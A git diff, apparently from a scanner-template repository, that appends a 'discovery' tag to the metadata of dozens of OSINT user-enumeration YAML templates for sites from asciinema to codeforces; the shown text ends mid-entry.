a/http/osint/user-enumeration/asciinema.yaml b/http/osint/user-enumeration/asciinema.yaml index 313cebb6bdf..c55be5170df 100644 --- a/http/osint/user-enumeration/asciinema.yaml +++ b/http/osint/user-enumeration/asciinema.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-coding,asciinema + tags: osint,osint-coding,asciinema,discovery self-contained: true diff --git a/http/osint/user-enumeration/askfm.yaml b/http/osint/user-enumeration/askfm.yaml index 06f1ba297a3..28fa5959909 100644 --- a/http/osint/user-enumeration/askfm.yaml +++ b/http/osint/user-enumeration/askfm.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,askfm + tags: osint,osint-social,askfm,discovery self-contained: true diff --git a/http/osint/user-enumeration/atcoder.yaml b/http/osint/user-enumeration/atcoder.yaml index dde60f59c92..75e5da1643b 100644 --- a/http/osint/user-enumeration/atcoder.yaml +++ b/http/osint/user-enumeration/atcoder.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: osint,osint-coding,atcoder + tags: osint,osint-coding,atcoder,discovery self-contained: true diff --git a/http/osint/user-enumeration/audiojungle.yaml b/http/osint/user-enumeration/audiojungle.yaml index 271df151303..cf222e18ce1 100644 --- a/http/osint/user-enumeration/audiojungle.yaml +++ b/http/osint/user-enumeration/audiojungle.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-music,audiojungle + tags: osint,osint-music,audiojungle,discovery self-contained: true diff --git a/http/osint/user-enumeration/auru.yaml b/http/osint/user-enumeration/auru.yaml index ae127f313d8..9b745f06459 100644 --- a/http/osint/user-enumeration/auru.yaml +++ b/http/osint/user-enumeration/auru.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,auru + tags: osint,osint-misc,auru,discovery self-contained: true diff --git a/http/osint/user-enumeration/authorstream.yaml b/http/osint/user-enumeration/authorstream.yaml index 5a1e8e03595..907a7b0096d 100644 --- a/http/osint/user-enumeration/authorstream.yaml +++ b/http/osint/user-enumeration/authorstream.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,authorstream + tags: osint,osint-social,authorstream,discovery self-contained: true diff --git a/http/osint/user-enumeration/avid-community.yaml b/http/osint/user-enumeration/avid-community.yaml index a0890d8ded4..59c619145ae 100644 --- a/http/osint/user-enumeration/avid-community.yaml +++ b/http/osint/user-enumeration/avid-community.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-music,avid-community + tags: osint,osint-music,avid-community,discovery self-contained: true diff --git a/http/osint/user-enumeration/babepedia.yaml b/http/osint/user-enumeration/babepedia.yaml index c2f65d5177c..87c6fa5d18d 100644 --- a/http/osint/user-enumeration/babepedia.yaml +++ b/http/osint/user-enumeration/babepedia.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,babepedia + tags: osint,osint-porn,babepedia,discovery self-contained: true diff --git a/http/osint/user-enumeration/babypips.yaml b/http/osint/user-enumeration/babypips.yaml index 2a959968330..e6be51345d0 100644 --- a/http/osint/user-enumeration/babypips.yaml +++ b/http/osint/user-enumeration/babypips.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,babypips + tags: osint,osint-social,babypips,discovery self-contained: true diff --git a/http/osint/user-enumeration/bandcamp.yaml b/http/osint/user-enumeration/bandcamp.yaml index c901e23870d..4cd99491601 100644 --- a/http/osint/user-enumeration/bandcamp.yaml +++ b/http/osint/user-enumeration/bandcamp.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-music,bandcamp + tags: osint,osint-music,bandcamp,discovery self-contained: true diff --git a/http/osint/user-enumeration/bandlab.yaml b/http/osint/user-enumeration/bandlab.yaml index 909726f3216..bc9dce87f05 100644 --- a/http/osint/user-enumeration/bandlab.yaml +++ b/http/osint/user-enumeration/bandlab.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-music,bandlab + tags: osint,osint-music,bandlab,discovery self-contained: true diff --git a/http/osint/user-enumeration/bblog-ru.yaml b/http/osint/user-enumeration/bblog-ru.yaml index d249db285a1..573da8289c4 100644 --- a/http/osint/user-enumeration/bblog-ru.yaml +++ b/http/osint/user-enumeration/bblog-ru.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,bblog-ru + tags: osint,osint-misc,bblog-ru,discovery self-contained: true diff --git a/http/osint/user-enumeration/bdsmlr.yaml b/http/osint/user-enumeration/bdsmlr.yaml index f6ec286a6fd..cfe9f4fe4f8 100644 --- a/http/osint/user-enumeration/bdsmlr.yaml +++ b/http/osint/user-enumeration/bdsmlr.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,bdsmlr + tags: osint,osint-porn,bdsmlr,discovery self-contained: true diff --git a/http/osint/user-enumeration/bdsmsingles.yaml b/http/osint/user-enumeration/bdsmsingles.yaml index fd10be1f0dc..a3bb7f26339 100644 --- a/http/osint/user-enumeration/bdsmsingles.yaml +++ b/http/osint/user-enumeration/bdsmsingles.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,bdsmsingles + tags: osint,osint-porn,bdsmsingles,discovery self-contained: true diff --git a/http/osint/user-enumeration/behance.yaml b/http/osint/user-enumeration/behance.yaml index 254e002821e..c6b3ee9471f 100644 --- a/http/osint/user-enumeration/behance.yaml +++ b/http/osint/user-enumeration/behance.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-business,behance + tags: osint,osint-business,behance,discovery self-contained: true diff --git a/http/osint/user-enumeration/bentbox.yaml b/http/osint/user-enumeration/bentbox.yaml index 254342741a2..a0bcaf2a15e 100644 --- a/http/osint/user-enumeration/bentbox.yaml +++ b/http/osint/user-enumeration/bentbox.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,bentbox + tags: osint,osint-porn,bentbox,discovery self-contained: true diff --git a/http/osint/user-enumeration/biggerpockets.yaml b/http/osint/user-enumeration/biggerpockets.yaml index 1bd159ce67a..e03b8ef4e1a 100644 --- a/http/osint/user-enumeration/biggerpockets.yaml +++ b/http/osint/user-enumeration/biggerpockets.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-finance,biggerpockets + tags: osint,osint-finance,biggerpockets,discovery self-contained: true diff --git a/http/osint/user-enumeration/bigo-live.yaml b/http/osint/user-enumeration/bigo-live.yaml index 23af50135aa..22a7a5597e5 100644 --- a/http/osint/user-enumeration/bigo-live.yaml +++ b/http/osint/user-enumeration/bigo-live.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,bigo-live + tags: osint,osint-gaming,bigo-live,discovery self-contained: true diff --git a/http/osint/user-enumeration/bikemap.yaml b/http/osint/user-enumeration/bikemap.yaml index a6605f02080..9bdec3bce44 100644 --- a/http/osint/user-enumeration/bikemap.yaml +++ b/http/osint/user-enumeration/bikemap.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-health,bikemap + tags: osint,osint-health,bikemap,discovery self-contained: true diff --git a/http/osint/user-enumeration/bimpos.yaml b/http/osint/user-enumeration/bimpos.yaml index 7c6b60bcf31..01543d6b18b 100644 --- a/http/osint/user-enumeration/bimpos.yaml +++ b/http/osint/user-enumeration/bimpos.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,bimpos + tags: osint,osint-tech,bimpos,discovery self-contained: true diff --git a/http/osint/user-enumeration/biolink.yaml b/http/osint/user-enumeration/biolink.yaml index 3d787ff15ac..27ce38c7bbc 100644 --- a/http/osint/user-enumeration/biolink.yaml +++ b/http/osint/user-enumeration/biolink.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,biolink + tags: osint,osint-misc,biolink,discovery self-contained: true diff --git a/http/osint/user-enumeration/bitbucket.yaml b/http/osint/user-enumeration/bitbucket.yaml index c36fa6b494f..11162abf42a 100644 --- a/http/osint/user-enumeration/bitbucket.yaml +++ b/http/osint/user-enumeration/bitbucket.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-coding,bitbucket + tags: osint,osint-coding,bitbucket,discovery self-contained: true diff --git a/http/osint/user-enumeration/bitchute.yaml b/http/osint/user-enumeration/bitchute.yaml index 3ff7a89baa0..e4e641ef0c8 100644 --- a/http/osint/user-enumeration/bitchute.yaml +++ b/http/osint/user-enumeration/bitchute.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-political,bitchute + tags: osint,osint-political,bitchute,discovery self-contained: true diff --git a/http/osint/user-enumeration/bitcoin-forum.yaml b/http/osint/user-enumeration/bitcoin-forum.yaml index 1fbc2a40e9f..662e8a0ca46 100644 --- a/http/osint/user-enumeration/bitcoin-forum.yaml +++ b/http/osint/user-enumeration/bitcoin-forum.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-finance,bitcoin-forum + tags: osint,osint-finance,bitcoin-forum,discovery self-contained: true diff --git a/http/osint/user-enumeration/bittube.yaml b/http/osint/user-enumeration/bittube.yaml index fb43ecdc5cf..266062077f8 100644 --- a/http/osint/user-enumeration/bittube.yaml +++ b/http/osint/user-enumeration/bittube.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-video,bittube + tags: osint,osint-video,bittube,discovery self-contained: true diff --git a/http/osint/user-enumeration/blipfm.yaml b/http/osint/user-enumeration/blipfm.yaml index 43a1c9b9e24..de3510d28e4 100644 --- a/http/osint/user-enumeration/blipfm.yaml +++ b/http/osint/user-enumeration/blipfm.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-music,blipfm + tags: osint,osint-music,blipfm,discovery self-contained: true diff --git a/http/osint/user-enumeration/blogger.yaml b/http/osint/user-enumeration/blogger.yaml index 4d5e8724555..8526e0c866a 100644 --- a/http/osint/user-enumeration/blogger.yaml +++ b/http/osint/user-enumeration/blogger.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-blog,blogger + tags: osint,osint-blog,blogger,discovery self-contained: true diff --git a/http/osint/user-enumeration/blogipl.yaml b/http/osint/user-enumeration/blogipl.yaml index 0f041baf25f..4892f8c0244 100644 --- a/http/osint/user-enumeration/blogipl.yaml +++ b/http/osint/user-enumeration/blogipl.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-blog,blogipl + tags: osint,osint-blog,blogipl,discovery self-contained: true diff --git a/http/osint/user-enumeration/blogmarks.yaml b/http/osint/user-enumeration/blogmarks.yaml index 0a88196e8a9..a513e793957 100644 --- a/http/osint/user-enumeration/blogmarks.yaml +++ b/http/osint/user-enumeration/blogmarks.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,blogmarks + tags: osint,osint-misc,blogmarks,discovery self-contained: true diff --git a/http/osint/user-enumeration/blogspot.yaml b/http/osint/user-enumeration/blogspot.yaml index 1102608357e..18bef756583 100644 --- a/http/osint/user-enumeration/blogspot.yaml +++ b/http/osint/user-enumeration/blogspot.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-blog,blogspot + tags: osint,osint-blog,blogspot,discovery self-contained: true diff --git a/http/osint/user-enumeration/bluesky.yaml b/http/osint/user-enumeration/bluesky.yaml index 9f4353a5638..47ed062874d 100644 --- a/http/osint/user-enumeration/bluesky.yaml +++ b/http/osint/user-enumeration/bluesky.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: osint,osint-social,bluesky + tags: osint,osint-social,bluesky,discovery self-contained: true diff --git a/http/osint/user-enumeration/bodybuildingcom.yaml b/http/osint/user-enumeration/bodybuildingcom.yaml index 478cb27c33a..5cc1991c236 100644 --- a/http/osint/user-enumeration/bodybuildingcom.yaml +++ b/http/osint/user-enumeration/bodybuildingcom.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-health,bodybuildingcom + tags: osint,osint-health,bodybuildingcom,discovery self-contained: true diff --git a/http/osint/user-enumeration/bonga-cams.yaml b/http/osint/user-enumeration/bonga-cams.yaml index c534f5e995e..d1bd3488317 100644 --- a/http/osint/user-enumeration/bonga-cams.yaml +++ b/http/osint/user-enumeration/bonga-cams.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,bonga-cams + tags: osint,osint-porn,bonga-cams,discovery self-contained: true diff --git a/http/osint/user-enumeration/bookcrossing.yaml b/http/osint/user-enumeration/bookcrossing.yaml index 43d658278a5..420cb333905 100644 --- a/http/osint/user-enumeration/bookcrossing.yaml +++ b/http/osint/user-enumeration/bookcrossing.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,bookcrossing + tags: osint,osint-hobby,bookcrossing,discovery self-contained: true diff --git a/http/osint/user-enumeration/boosty.yaml b/http/osint/user-enumeration/boosty.yaml index cdf8384f6b1..0444ac103b0 100644 --- a/http/osint/user-enumeration/boosty.yaml +++ b/http/osint/user-enumeration/boosty.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,boosty + tags: osint,osint-social,boosty,discovery self-contained: true diff --git a/http/osint/user-enumeration/booth.yaml b/http/osint/user-enumeration/booth.yaml index 28dae0e167d..c66eff75c97 100644 --- a/http/osint/user-enumeration/booth.yaml +++ b/http/osint/user-enumeration/booth.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-shopping,booth + tags: osint,osint-shopping,booth,discovery self-contained: true diff --git a/http/osint/user-enumeration/breach-forums.yaml b/http/osint/user-enumeration/breach-forums.yaml index 3cf56a66549..0e6104f2e0a 100644 --- a/http/osint/user-enumeration/breach-forums.yaml +++ b/http/osint/user-enumeration/breach-forums.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,breach-forums + tags: osint,osint-tech,breach-forums,discovery self-contained: true diff --git a/http/osint/user-enumeration/brickset.yaml b/http/osint/user-enumeration/brickset.yaml index 74c6ca8bde9..3ed0170b9a0 100644 --- a/http/osint/user-enumeration/brickset.yaml +++ b/http/osint/user-enumeration/brickset.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,brickset + tags: osint,osint-hobby,brickset,discovery self-contained: true diff --git a/http/osint/user-enumeration/bsky.yaml b/http/osint/user-enumeration/bsky.yaml index f6847abcea0..58dc7b3c821 100644 --- a/http/osint/user-enumeration/bsky.yaml +++ b/http/osint/user-enumeration/bsky.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: osint,osint-social,bsky + tags: osint,osint-social,bsky,discovery self-contained: true diff --git a/http/osint/user-enumeration/bugcrowd.yaml b/http/osint/user-enumeration/bugcrowd.yaml index c6786f589fd..5efae458789 100644 --- a/http/osint/user-enumeration/bugcrowd.yaml +++ b/http/osint/user-enumeration/bugcrowd.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,bugcrowd + tags: osint,osint-tech,bugcrowd,discovery self-contained: true diff --git a/http/osint/user-enumeration/bunpro.yaml b/http/osint/user-enumeration/bunpro.yaml index 1251e6fea2f..4c5e76fb5d2 100644 --- a/http/osint/user-enumeration/bunpro.yaml +++ b/http/osint/user-enumeration/bunpro.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,bunpro + tags: osint,osint-social,bunpro,discovery self-contained: true diff --git a/http/osint/user-enumeration/buymeacoffee.yaml b/http/osint/user-enumeration/buymeacoffee.yaml index 79ca13ff65c..b3cbbce418f 100644 --- a/http/osint/user-enumeration/buymeacoffee.yaml +++ b/http/osint/user-enumeration/buymeacoffee.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-finance,buymeacoffee + tags: osint,osint-finance,buymeacoffee,discovery self-contained: true diff --git a/http/osint/user-enumeration/buzzfeed.yaml b/http/osint/user-enumeration/buzzfeed.yaml index aa418f0abcd..38336684b3e 100644 --- a/http/osint/user-enumeration/buzzfeed.yaml +++ b/http/osint/user-enumeration/buzzfeed.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,buzzfeed + tags: osint,osint-social,buzzfeed,discovery self-contained: true diff --git a/http/osint/user-enumeration/buzznet.yaml b/http/osint/user-enumeration/buzznet.yaml index 2f4faf523b0..03ff4dd6fdf 100644 --- a/http/osint/user-enumeration/buzznet.yaml +++ b/http/osint/user-enumeration/buzznet.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-news,buzznet + tags: osint,osint-news,buzznet,discovery self-contained: true diff --git a/http/osint/user-enumeration/cafecito.yaml b/http/osint/user-enumeration/cafecito.yaml index ada7d747203..45c9eaacb31 100644 --- a/http/osint/user-enumeration/cafecito.yaml +++ b/http/osint/user-enumeration/cafecito.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,cafecito + tags: osint,osint-misc,cafecito,discovery self-contained: true diff --git a/http/osint/user-enumeration/cal.yaml b/http/osint/user-enumeration/cal.yaml index 7dedd27525c..2e675665f73 100644 --- a/http/osint/user-enumeration/cal.yaml +++ b/http/osint/user-enumeration/cal.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,cal,caldotcom + tags: osint,osint-social,cal,caldotcom,discovery self-contained: true diff --git a/http/osint/user-enumeration/calendy.yaml b/http/osint/user-enumeration/calendy.yaml index 01dee9bea94..ac366957d8c 100644 --- a/http/osint/user-enumeration/calendy.yaml +++ b/http/osint/user-enumeration/calendy.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,calendy + tags: osint,osint-misc,calendy,discovery self-contained: true diff --git a/http/osint/user-enumeration/cameo.yaml b/http/osint/user-enumeration/cameo.yaml index 7aa3c0c203e..8a89959fb69 100644 --- a/http/osint/user-enumeration/cameo.yaml +++ b/http/osint/user-enumeration/cameo.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-shopping,cameo + tags: osint,osint-shopping,cameo,discovery self-contained: true diff --git a/http/osint/user-enumeration/carbonmade.yaml b/http/osint/user-enumeration/carbonmade.yaml index 3e197b9d143..4f1779a1912 100644 --- a/http/osint/user-enumeration/carbonmade.yaml +++ b/http/osint/user-enumeration/carbonmade.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,carbonmade + tags: osint,osint-hobby,carbonmade,discovery self-contained: true diff --git a/http/osint/user-enumeration/careerhabr.yaml b/http/osint/user-enumeration/careerhabr.yaml index cba59be807c..a4cf7e3a12d 100644 --- a/http/osint/user-enumeration/careerhabr.yaml +++ b/http/osint/user-enumeration/careerhabr.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-business,careerhabr + tags: osint,osint-business,careerhabr,discovery self-contained: true diff --git a/http/osint/user-enumeration/caringbridge.yaml b/http/osint/user-enumeration/caringbridge.yaml index 7c90b515c5a..ff4c734557e 100644 --- a/http/osint/user-enumeration/caringbridge.yaml +++ b/http/osint/user-enumeration/caringbridge.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-health,caringbridge + tags: osint,osint-health,caringbridge,discovery self-contained: true diff --git a/http/osint/user-enumeration/carrdco.yaml b/http/osint/user-enumeration/carrdco.yaml index 3ec36a61970..da85a7599da 100644 --- a/http/osint/user-enumeration/carrdco.yaml +++ b/http/osint/user-enumeration/carrdco.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-business,carrdco + tags: osint,osint-business,carrdco,discovery self-contained: true diff --git a/http/osint/user-enumeration/cashapp.yaml b/http/osint/user-enumeration/cashapp.yaml index 13777f69fa6..05aefb48105 100644 --- a/http/osint/user-enumeration/cashapp.yaml +++ b/http/osint/user-enumeration/cashapp.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-finance,cashapp + tags: osint,osint-finance,cashapp,discovery self-contained: true diff --git a/http/osint/user-enumeration/castingcallclub.yaml b/http/osint/user-enumeration/castingcallclub.yaml index 104f68eab7e..b45c5cbeac7 100644 --- a/http/osint/user-enumeration/castingcallclub.yaml +++ b/http/osint/user-enumeration/castingcallclub.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,castingcallclub + tags: osint,osint-hobby,castingcallclub,discovery self-contained: true diff --git a/http/osint/user-enumeration/cd-action.yaml b/http/osint/user-enumeration/cd-action.yaml index 4103271fd8c..4986f2a5e30 100644 --- a/http/osint/user-enumeration/cd-action.yaml +++ b/http/osint/user-enumeration/cd-action.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,cd-action + tags: osint,osint-gaming,cd-action,discovery self-contained: true diff --git a/http/osint/user-enumeration/cdapl.yaml b/http/osint/user-enumeration/cdapl.yaml index eb432e88e0d..b65f0ca309f 100644 --- a/http/osint/user-enumeration/cdapl.yaml +++ b/http/osint/user-enumeration/cdapl.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-video,cdapl + tags: osint,osint-video,cdapl,discovery self-contained: true diff --git a/http/osint/user-enumeration/cgtrader.yaml b/http/osint/user-enumeration/cgtrader.yaml index b56a16cb6ad..c12d274f20f 100644 --- a/http/osint/user-enumeration/cgtrader.yaml +++ b/http/osint/user-enumeration/cgtrader.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: osint,osint-creative,cgtrader + tags: osint,osint-creative,cgtrader,discovery self-contained: true diff --git a/http/osint/user-enumeration/championat.yaml b/http/osint/user-enumeration/championat.yaml index 899e5049684..c9afb0aa437 100644 --- a/http/osint/user-enumeration/championat.yaml +++ b/http/osint/user-enumeration/championat.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-news,championat + tags: osint,osint-news,championat,discovery self-contained: true diff --git a/http/osint/user-enumeration/chamsko.yaml b/http/osint/user-enumeration/chamsko.yaml index 12ae25f6135..97c7d00b7c7 100644 --- a/http/osint/user-enumeration/chamsko.yaml +++ b/http/osint/user-enumeration/chamsko.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-images,chamsko + tags: osint,osint-images,chamsko,discovery self-contained: true diff --git a/http/osint/user-enumeration/chaturbate.yaml b/http/osint/user-enumeration/chaturbate.yaml index 61d40ba3dcb..a2d9b1fac04 100644 --- a/http/osint/user-enumeration/chaturbate.yaml +++ b/http/osint/user-enumeration/chaturbate.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,chaturbate + tags: osint,osint-porn,chaturbate,discovery self-contained: true diff --git a/http/osint/user-enumeration/cheezburger.yaml b/http/osint/user-enumeration/cheezburger.yaml index 7a31d6b2702..7531442a1fe 100644 --- a/http/osint/user-enumeration/cheezburger.yaml +++ b/http/osint/user-enumeration/cheezburger.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,cheezburger + tags: osint,osint-hobby,cheezburger,discovery self-contained: true diff --git a/http/osint/user-enumeration/chesscom.yaml b/http/osint/user-enumeration/chesscom.yaml index e0a04a4d46a..a8a03596705 100644 --- a/http/osint/user-enumeration/chesscom.yaml +++ b/http/osint/user-enumeration/chesscom.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,chesscom + tags: osint,osint-gaming,chesscom,discovery self-contained: true diff --git a/http/osint/user-enumeration/chomikujpl.yaml b/http/osint/user-enumeration/chomikujpl.yaml index 76b61ffa5a0..aa154f7f8e6 100644 --- a/http/osint/user-enumeration/chomikujpl.yaml +++ b/http/osint/user-enumeration/chomikujpl.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,chomikujpl + tags: osint,osint-misc,chomikujpl,discovery self-contained: true diff --git a/http/osint/user-enumeration/chyoa.yaml b/http/osint/user-enumeration/chyoa.yaml index 80e5383a32b..30430d16270 100644 --- a/http/osint/user-enumeration/chyoa.yaml +++ b/http/osint/user-enumeration/chyoa.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,chyoa + tags: osint,osint-porn,chyoa,discovery self-contained: true diff --git a/http/osint/user-enumeration/climatejusticerocks-mastodon-instance.yaml b/http/osint/user-enumeration/climatejusticerocks-mastodon-instance.yaml index 717eb30103b..41750e5d10a 100644 --- a/http/osint/user-enumeration/climatejusticerocks-mastodon-instance.yaml +++ b/http/osint/user-enumeration/climatejusticerocks-mastodon-instance.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,climatejusticerocks-mastodon-instance + tags: osint,osint-social,climatejusticerocks-mastodon-instance,discovery self-contained: true diff --git a/http/osint/user-enumeration/cloudflare.yaml b/http/osint/user-enumeration/cloudflare.yaml index b4eb3a8af42..bb6558d71d1 100644 --- a/http/osint/user-enumeration/cloudflare.yaml +++ b/http/osint/user-enumeration/cloudflare.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,cloudflare + tags: osint,osint-tech,cloudflare,discovery self-contained: true diff --git a/http/osint/user-enumeration/clubhouse.yaml b/http/osint/user-enumeration/clubhouse.yaml index 79f1400d69c..39cbba1c5b8 100644 --- a/http/osint/user-enumeration/clubhouse.yaml +++ b/http/osint/user-enumeration/clubhouse.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,clubhouse + tags: osint,osint-social,clubhouse,discovery self-contained: true diff --git a/http/osint/user-enumeration/clusterdafrica.yaml b/http/osint/user-enumeration/clusterdafrica.yaml index 10672c5895e..68d4f2ecd14 100644 --- a/http/osint/user-enumeration/clusterdafrica.yaml +++ b/http/osint/user-enumeration/clusterdafrica.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,clusterdafrica + tags: osint,osint-social,clusterdafrica,discovery self-contained: true diff --git a/http/osint/user-enumeration/cnet.yaml b/http/osint/user-enumeration/cnet.yaml index 60d4c9dde97..e3e18066829 100644 --- a/http/osint/user-enumeration/cnet.yaml +++ b/http/osint/user-enumeration/cnet.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-news,cnet + tags: osint,osint-news,cnet,discovery self-contained: true diff --git a/http/osint/user-enumeration/codeberg.yaml b/http/osint/user-enumeration/codeberg.yaml index e8505f593be..a7526d48b15 100644 --- a/http/osint/user-enumeration/codeberg.yaml +++ b/http/osint/user-enumeration/codeberg.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-coding,codeberg + tags: osint,osint-coding,codeberg,discovery self-contained: true diff --git a/http/osint/user-enumeration/codecademy.yaml b/http/osint/user-enumeration/codecademy.yaml index a3b0004716b..a7ad08fd291 100644 --- a/http/osint/user-enumeration/codecademy.yaml +++ b/http/osint/user-enumeration/codecademy.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-coding,codecademy + tags: osint,osint-coding,codecademy,discovery self-contained: true diff --git a/http/osint/user-enumeration/codechef.yaml b/http/osint/user-enumeration/codechef.yaml index cd65da7a0f0..0bdaa53d254 100644 --- a/http/osint/user-enumeration/codechef.yaml +++ b/http/osint/user-enumeration/codechef.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: osint,osint-coding,codechef + tags: osint,osint-coding,codechef,discovery self-contained: true diff --git a/http/osint/user-enumeration/codeforces.yaml b/http/osint/user-enumeration/codeforces.yaml index 3508740ee73..7ac15ae012f 100644 --- a/http/osint/user-enumeration/codeforces.yaml +++ b/http/osint/user-enumeration/codeforces.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-coding,codeforces + tags: 